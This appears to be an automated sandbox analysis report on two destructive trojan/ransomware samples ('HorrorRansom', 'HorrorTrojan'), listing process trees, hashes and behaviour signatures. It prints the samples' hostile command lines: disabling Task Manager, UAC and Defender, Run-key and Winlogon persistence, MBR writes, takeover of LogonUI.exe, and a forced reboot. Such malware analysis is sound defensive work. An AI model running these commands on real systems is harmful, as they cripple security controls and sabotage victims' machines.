PID 2288 wrote to memory of 2816 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 2288 wrote to memory of 2816 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 2288 wrote to memory of 2816 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 2288 wrote to memory of 4812 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 2288 wrote to memory of 4812 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 2288 wrote to memory of 4812 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 2288 wrote to memory of 2444 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\shutdown.exe
PID 2288 wrote to memory of 2444 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\shutdown.exe
PID 2288 wrote to memory of 2444 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\shutdown.exe

Processes

C:\Users\Admin\AppData\Local\Temp\Dest\HorrorRansom 1.0 Final.exe

"C:\Users\Admin\AppData\Local\Temp\Dest\HorrorRansom 1.0 Final.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\81C3.tmp\BobuxGen.cmd""

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f

C:\Windows\SysWOW64\reg.exe

reg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d c:\note.bmp /f

C:\Windows\SysWOW64\reg.exe

reg.exe ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\ActiveDesktop /v NoChangingWallPaper /t REG_DWORD /d 1 /f

C:\Windows\SysWOW64\reg.exe

reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f

C:\Windows\SysWOW64\reg.exe

Reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "death666" /t REG_SZ /F /D "C:\HostFile.exe"

C:\Windows\SysWOW64\shutdown.exe

shutdown /r /t 00

C:\Windows\system32\LogonUI.exe

"LogonUI.exe" /flags:0x4 /state0:0xa39b3055 /state1:0x41c64e6d

Network

Files

memory/4760-0-0x0000000000400000-0x0000000000A12000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\81C3.tmp\BobuxGen.cmd

MD5 47f426fb3883f2da30e9aa2a7d693fa5
SHA1 50d843d68817717f21ba96d26a571ad996a5e35a
SHA256 b1c9a35d14eec5c522fd82babfae348dc244996f75d36543347208acf6f0f85b
SHA512 2e588a0d6e2fb86e447d165d28b0600a9fe6fd670b391f70a918c333259a5b171a18837c73927c3a6de3240557b1860fe7bc616801c3dc16b9d6373c362ffacb

C:\Users\Admin\AppData\Local\Temp\81C3.tmp\note.bmp

MD5 ed30c76a614ec8db5e4ac22e2929f53d
SHA1 27ab24ede0ec37cedd2cbf4d9f7135375f031fa4
SHA256 96df16e4bef56e83f8f1106834aa23caf05972549d1c24c1f7def12e6ef4d21a
SHA512 ec941a162de8fb1b32a71256ba11104775ff67424a6098e61f8d362ecc6547458e1cc4343dacd2b8df359da487d66832c2813e951d733b29803402f8206dfa8b

C:\Users\Admin\AppData\Local\Temp\81C3.tmp\HostFile.exe

MD5 c875f76e521f520404401122bd82630a
SHA1 3b1c78420a55b9a768b28168753c4e22982421ef
SHA256 a58caeb57da3061620dccfc374b2fba87c3061d981782d47a5dcc287e1db1d11
SHA512 b712f09c1b5fcee804da12c45e2404b265b9a18e40b9ede4f6336e3a42086e1b02bfe9ba1b5ec487251e6d96b15f5ed4a179690a8f4ae2cc36454a15f136b54b

memory/4760-15-0x0000000000400000-0x0000000000A12000-memory.dmp

Analysis: behavioral3

Detonation Overview

Submitted

2024-11-08 14:13

Reported

2024-11-08 14:17

Platform

win11-20241007-en

Max time kernel

219s

Max time network

202s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Dest\HorrorTrojan Ultimate Edition.exe"

Signatures

Modifies WinLogon for persistence

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, wscript.exe \"C:\\windows\\winbase_base_procid_none\\secureloc0x65\\WinRapistI386.vbs\"" C:\Users\Admin\AppData\Local\Temp\783D.tmp\gdifuncs.exe N/A

UAC bypass

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\Users\Admin\AppData\Local\Temp\783D.tmp\gdifuncs.exe N/A

Disables Task Manager via registry modification

evasion

Possible privilege escalation attempt

exploit
Description Indicator Process Target
N/A N/A C:\windows\SysWOW64\takeown.exe N/A
N/A N/A C:\windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\takeown.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A

Modifies file permissions

discovery
Description Indicator Process Target
N/A N/A C:\windows\SysWOW64\takeown.exe N/A
N/A N/A C:\windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\takeown.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A

Writes to the Master Boot Record (MBR)

bootkit persistence
Description Indicator Process Target
File opened for modification \??\PhysicalDrive0 C:\Users\Admin\AppData\Local\Temp\783D.tmp\mbr.exe N/A

Sets desktop wallpaper using registry

ransomware
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-4018527317-446799424-2810249686-1000\Control Panel\Desktop\Wallpaper = "c:\\bg.bmp" C:\Windows\system32\reg.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification \??\c:\windows\WinAttr.gci C:\Windows\SysWOW64\cmd.exe N/A
File created \??\c:\windows\winbase_base_procid_none\secureloc0x65\gdifuncs.exe C:\Windows\system32\cmd.exe N/A
File opened for modification \??\c:\windows\winbase_base_procid_none\secureloc0x65\gdifuncs.exe C:\Windows\system32\cmd.exe N/A
File created \??\c:\windows\winbase_base_procid_none\secureloc0x65\mainbgtheme.wav C:\Windows\system32\cmd.exe N/A
File opened for modification \??\c:\windows\winbase_base_procid_none\secureloc0x65\mainbgtheme.wav C:\Windows\system32\cmd.exe N/A
File created C:\windows\WinAttr.gci C:\Users\Admin\AppData\Local\Temp\783D.tmp\gdifuncs.exe N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\783D.tmp\gdifuncs.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\windows\SysWOW64\icacls.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\takeown.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\timeout.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\Dest\HorrorTrojan Ultimate Edition.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\783D.tmp\mbr.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\783D.tmp\jeffpopup.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\icacls.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\783D.tmp\bobcreep.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\windows\SysWOW64\takeown.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A

Delays execution with timeout.exe

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A

Modifies Control Panel

evasion
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-4018527317-446799424-2810249686-1000\Control Panel\Cursors\Arrow = "C:\\Windows\\winbase_base_procid_none\\secureloc0x65\\rcur.cur" C:\Users\Admin\AppData\Local\Temp\783D.tmp\gdifuncs.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-4018527317-446799424-2810249686-1000\Control Panel\Cursors\AppStarting = "C:\\Windows\\winbase_base_procid_none\\secureloc0x65\\rcur.cur" C:\Users\Admin\AppData\Local\Temp\783D.tmp\gdifuncs.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-4018527317-446799424-2810249686-1000\Control Panel\Cursors\Hand = "C:\\Windows\\winbase_base_procid_none\\secureloc0x65\\rcur.cur" C:\Users\Admin\AppData\Local\Temp\783D.tmp\gdifuncs.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-4018527317-446799424-2810249686-1000_Classes\Local Settings\MuiCache C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\783D.tmp\gdifuncs.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\783D.tmp\gdifuncs.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\783D.tmp\gdifuncs.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\783D.tmp\gdifuncs.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\783D.tmp\gdifuncs.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\783D.tmp\gdifuncs.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\783D.tmp\gdifuncs.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\783D.tmp\gdifuncs.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\783D.tmp\gdifuncs.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\783D.tmp\gdifuncs.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\783D.tmp\gdifuncs.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\783D.tmp\gdifuncs.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\783D.tmp\gdifuncs.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\783D.tmp\gdifuncs.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\783D.tmp\gdifuncs.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\783D.tmp\gdifuncs.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\783D.tmp\gdifuncs.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\783D.tmp\gdifuncs.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\783D.tmp\gdifuncs.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\783D.tmp\gdifuncs.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\783D.tmp\gdifuncs.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\783D.tmp\gdifuncs.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\783D.tmp\gdifuncs.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\783D.tmp\gdifuncs.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\783D.tmp\gdifuncs.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\783D.tmp\gdifuncs.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\783D.tmp\gdifuncs.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\783D.tmp\gdifuncs.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\783D.tmp\gdifuncs.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\783D.tmp\gdifuncs.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\783D.tmp\gdifuncs.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\783D.tmp\gdifuncs.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\783D.tmp\gdifuncs.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\783D.tmp\gdifuncs.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\783D.tmp\gdifuncs.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\783D.tmp\gdifuncs.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\783D.tmp\gdifuncs.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\783D.tmp\gdifuncs.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\783D.tmp\gdifuncs.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\783D.tmp\gdifuncs.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\783D.tmp\gdifuncs.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\783D.tmp\gdifuncs.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\783D.tmp\gdifuncs.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\783D.tmp\gdifuncs.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\783D.tmp\gdifuncs.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\783D.tmp\gdifuncs.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\783D.tmp\gdifuncs.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\783D.tmp\gdifuncs.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\783D.tmp\gdifuncs.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\783D.tmp\gdifuncs.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\783D.tmp\gdifuncs.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\783D.tmp\gdifuncs.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\783D.tmp\gdifuncs.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\783D.tmp\gdifuncs.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\783D.tmp\gdifuncs.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\783D.tmp\gdifuncs.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\783D.tmp\gdifuncs.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\783D.tmp\gdifuncs.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\783D.tmp\gdifuncs.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\783D.tmp\gdifuncs.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\783D.tmp\gdifuncs.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\783D.tmp\gdifuncs.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\783D.tmp\gdifuncs.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\783D.tmp\gdifuncs.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\783D.tmp\gdifuncs.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\783D.tmp\gdifuncs.exe N/A
Token: 33 N/A C:\Windows\system32\AUDIODG.EXE N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\system32\AUDIODG.EXE N/A
Token: SeTakeOwnershipPrivilege N/A C:\windows\SysWOW64\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\takeown.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 5840 wrote to memory of 1424 N/A C:\Users\Admin\AppData\Local\Temp\Dest\HorrorTrojan Ultimate Edition.exe C:\Windows\system32\wscript.exe
PID 5840 wrote to memory of 1424 N/A C:\Users\Admin\AppData\Local\Temp\Dest\HorrorTrojan Ultimate Edition.exe C:\Windows\system32\wscript.exe
PID 1424 wrote to memory of 2508 N/A C:\Windows\system32\wscript.exe C:\Users\Admin\AppData\Local\Temp\783D.tmp\mbr.exe
PID 1424 wrote to memory of 2508 N/A C:\Windows\system32\wscript.exe C:\Users\Admin\AppData\Local\Temp\783D.tmp\mbr.exe
PID 1424 wrote to memory of 2508 N/A C:\Windows\system32\wscript.exe C:\Users\Admin\AppData\Local\Temp\783D.tmp\mbr.exe
PID 1424 wrote to memory of 3568 N/A C:\Windows\system32\wscript.exe C:\Windows\system32\cmd.exe
PID 1424 wrote to memory of 3568 N/A C:\Windows\system32\wscript.exe C:\Windows\system32\cmd.exe
PID 3568 wrote to memory of 1728 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3568 wrote to memory of 1728 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3568 wrote to memory of 1620 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\rundll32.exe
PID 3568 wrote to memory of 1620 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\rundll32.exe
PID 3568 wrote to memory of 3984 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\rundll32.exe
PID 3568 wrote to memory of 3984 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\rundll32.exe
PID 3568 wrote to memory of 6012 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\rundll32.exe
PID 3568 wrote to memory of 6012 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\rundll32.exe
PID 3568 wrote to memory of 900 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\rundll32.exe
PID 3568 wrote to memory of 900 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\rundll32.exe
PID 3568 wrote to memory of 4780 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\rundll32.exe
PID 3568 wrote to memory of 4780 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\rundll32.exe
PID 3568 wrote to memory of 4144 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\rundll32.exe
PID 3568 wrote to memory of 4144 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\rundll32.exe
PID 3568 wrote to memory of 1904 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\rundll32.exe
PID 3568 wrote to memory of 1904 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\rundll32.exe
PID 3568 wrote to memory of 5124 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\rundll32.exe
PID 3568 wrote to memory of 5124 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\rundll32.exe
PID 3568 wrote to memory of 5792 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\rundll32.exe
PID 3568 wrote to memory of 5792 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\rundll32.exe
PID 3568 wrote to memory of 3332 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\rundll32.exe
PID 3568 wrote to memory of 3332 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\rundll32.exe
PID 3568 wrote to memory of 1228 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\rundll32.exe
PID 3568 wrote to memory of 1228 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\rundll32.exe
PID 3568 wrote to memory of 4120 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\rundll32.exe
PID 3568 wrote to memory of 4120 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\rundll32.exe
PID 3568 wrote to memory of 4128 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\rundll32.exe
PID 3568 wrote to memory of 4128 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\rundll32.exe
PID 3568 wrote to memory of 5300 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\rundll32.exe
PID 3568 wrote to memory of 5300 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\rundll32.exe
PID 3568 wrote to memory of 5160 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\rundll32.exe
PID 3568 wrote to memory of 5160 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\rundll32.exe
PID 3568 wrote to memory of 1332 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\rundll32.exe
PID 3568 wrote to memory of 1332 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\rundll32.exe
PID 3568 wrote to memory of 3676 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\rundll32.exe
PID 3568 wrote to memory of 3676 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\rundll32.exe
PID 3568 wrote to memory of 2604 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\rundll32.exe
PID 3568 wrote to memory of 2604 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\rundll32.exe
PID 3568 wrote to memory of 2100 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\rundll32.exe
PID 3568 wrote to memory of 2100 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\rundll32.exe
PID 3568 wrote to memory of 4912 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\rundll32.exe
PID 3568 wrote to memory of 4912 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\rundll32.exe
PID 3568 wrote to memory of 740 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\rundll32.exe
PID 3568 wrote to memory of 740 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\rundll32.exe
PID 3568 wrote to memory of 4748 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\rundll32.exe
PID 3568 wrote to memory of 4748 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\rundll32.exe
PID 3568 wrote to memory of 932 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\rundll32.exe
PID 3568 wrote to memory of 932 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\rundll32.exe
PID 3568 wrote to memory of 4956 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\rundll32.exe
PID 3568 wrote to memory of 4956 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\rundll32.exe
PID 3568 wrote to memory of 1376 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\rundll32.exe
PID 3568 wrote to memory of 1376 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\rundll32.exe
PID 3568 wrote to memory of 2000 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\rundll32.exe
PID 3568 wrote to memory of 2000 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\rundll32.exe
PID 3568 wrote to memory of 2112 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\rundll32.exe
PID 3568 wrote to memory of 2112 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\rundll32.exe
PID 3568 wrote to memory of 1572 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\rundll32.exe

System policy modification

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\Users\Admin\AppData\Local\Temp\783D.tmp\gdifuncs.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\Dest\HorrorTrojan Ultimate Edition.exe

"C:\Users\Admin\AppData\Local\Temp\Dest\HorrorTrojan Ultimate Edition.exe"

C:\Windows\system32\wscript.exe

"C:\Windows\sysnative\wscript.exe" C:\Users\Admin\AppData\Local\Temp\783D.tmp\783E.tmp\783F.vbs //Nologo

C:\Users\Admin\AppData\Local\Temp\783D.tmp\mbr.exe

"C:\Users\Admin\AppData\Local\Temp\783D.tmp\mbr.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\783D.tmp\tools.cmd" "

C:\Windows\system32\reg.exe

reg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d c:\bg.bmp /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Users\Admin\AppData\Local\Temp\783D.tmp\jeffpopup.exe

"C:\Users\Admin\AppData\Local\Temp\783D.tmp\jeffpopup.exe"

C:\Users\Admin\AppData\Local\Temp\783D.tmp\bobcreep.exe

"C:\Users\Admin\AppData\Local\Temp\783D.tmp\bobcreep.exe"

C:\Users\Admin\AppData\Local\Temp\783D.tmp\gdifuncs.exe

"C:\Users\Admin\AppData\Local\Temp\783D.tmp\gdifuncs.exe"

C:\Windows\system32\AUDIODG.EXE

C:\Windows\system32\AUDIODG.EXE 0x00000000000004EC 0x00000000000004E8

C:\Windows\System32\rundll32.exe

C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding

C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe

"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe" -ServerName:MiniSearchUI.AppXj3y73at8fy1htwztzxs68sxx1v7cksp7.mca

C:\windows\SysWOW64\takeown.exe

"C:\windows\system32\takeown.exe" /f C:\windows\system32\LogonUI.exe

C:\windows\SysWOW64\icacls.exe

"C:\windows\system32\icacls.exe" C:\\windows\\system32\\LogonUI.exe /granted "Admin":F

